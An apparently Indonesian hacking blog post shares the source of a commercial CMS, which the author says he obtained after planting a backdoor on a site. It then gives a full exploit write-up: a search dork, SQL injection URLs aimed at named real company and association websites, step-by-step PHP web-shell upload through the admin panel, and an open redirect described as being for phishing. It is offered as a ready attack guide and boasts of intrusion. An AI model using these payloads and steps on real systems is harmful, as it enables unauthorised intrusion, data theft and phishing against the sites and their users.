Jrobalian CMS

‎[Share] Script PHP yang dipakai oleh Website idijakarta, daikinaircon, jamsostek, dll (Jrobalian CMS <--- Bukan nama yang sebenarnya)Wokwokwok... Iseng-iseng berhadiah, nanem Backdoor ke salah satu Web yang pakek CMS itu, eh ternyata di dalem Webnya ada file .tar yang isinya Script CMS nya :)) =))

Download di sini (ada 2 file, coba aja ke-2 nya) :http://www.indowebster.com/download/files/jrobalian_cms

Sekalian mau share Exploitnya ah

=====================================================Jrobalian CMS SQL Multiple Vulnerabilities=====================================================

:----------------------------------------------------------------------------------------------------------------------------------------:: # Exploit Title : Jrobalian CMS SQL Injection Vulnerability: # Date : 21 July 2012: # Author : X-Cisadane: # Software Link : http://www.jrobalian.com/ : # Version : ALL: # Category : Web Applications: # Vulnerability : SQL Injection Vulnerability, Upload Shell Vulnerability & Open Redirection: # Tested On : Mozilla Firefox 7.0.1 (Windows): # Greetz to : Andry Priatna, X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Winda Utari:----------------------------------------------------------------------------------------------------------------------------------------:DORKS=====inurl:i.php?mid=

Proof of Concept================1.SQL Injection (With Error Notice & Without Error Notice)SITE TARGET.com/content/i.php?mid=[SQLi]ORSITE TARGET.com/content/i.php?mid=Integer Value&id=[SQLi]Example :http://www.daikinaircon.co.id/content/i.php?mid=4&id=41'http://www.investors-academy.co.id/content/i.php?mid=3&id=7'http://www.pdpersi.co.id/content/i.php?mid=3&id=112'http://www.indosuksesfutures.com/content/i.php?mid=3&id=81'http://www.shop4mattress.com/content/i.php?mid=69'

Others :SITE TARGET.com/content/news.php?catid=[SQLi]Example :http://www.indosuksesfutures.com/content/news.php?catid=1%27&%3Fmid=6&id=20http://www.idijakbar.com/content/news.php?catid=1'http://www.contohwebsite.com/content/news.php?catid=1%27&mid=4&id=24http://www.quadras.co.id/content/news.php?show=comment&id=11'http://www.contohwebsite.com/content/pd_events.php?mid=4&id&catid=1%27&show=archivehttp://www.daikinaircon.co.id/content/products.php?plid=1&mid=2&id=21'http://www.daikinaircon.co.id/content/projects.php?mid=3&ptid=13'http://www.daikinaircon.co.id/content/gallery.php?&mid=13&id=17'http://www.daikinaircon.co.id/content/downloads.php?&mid=5&id=28'http://www.daikinaircon.co.id/content/faqs.php?&mid=5&id=29'http://www.daikinaircon.co.id/content/training.php?&mid=5&id=30'Explore more your self...

Tested With Havij - Advanced SQL Injection Tool Version 1.15 Free

2.Upload Shell (Must login with admin privilege)If the force with you (you've successfully cracked the password) 0:) you can login with Admin privilege into CMS.

Admin login page :SITE TARGET.com/admin/orSITE TARGET.com/content/admin/Example : http://www.shop4mattress.com/admin/

Then Upload Shell from Administrator Modules -> Website Contents -> Newsroom & Articles -> Create NEW Articles.Insert an ATTACHMENT (your .php Backdoor)Then check Published to yes, and click SAVE!After that check your PHP Backdoor in this directory -> 'SITE TARGET.com/content_file/YOUR PHP BACKDOOR.php' 

OR you can upload PHP Shell from Administrator Modules -> Website Contents -> Downloads -> Create New file to Downloads.Insert Title, Description, Insert your PHP Backdoor (browse)Then click SAVE!After that check your PHP Backdoor in this directory -> 'SITE TARGET.com/content/downloads.php'Then Click Button 'Unduh' (Download), After that your browser will shown a pop-up to download a file, example : file21_ba.php <--- Your PHP Backdoor which automatically renamed by the CMS.You can access file21_ba.php by following this link 'SITE TARGET.com/downloads/Your Renamed PHP Backdoor.php'

3.Open RedirectionWe can Redirect users to another page (For Phising)SITE TARGET.com/content/chlang.php?lang=en&mid=&refpage=[PAGE.php OR YOUR FVCKIN SITE]Example : http://www.contohwebsite.com/content/chlang.php?lang=en&mid&refpage=http%3A%2F%2Fgoogle.co.uk

Posted in: Hacking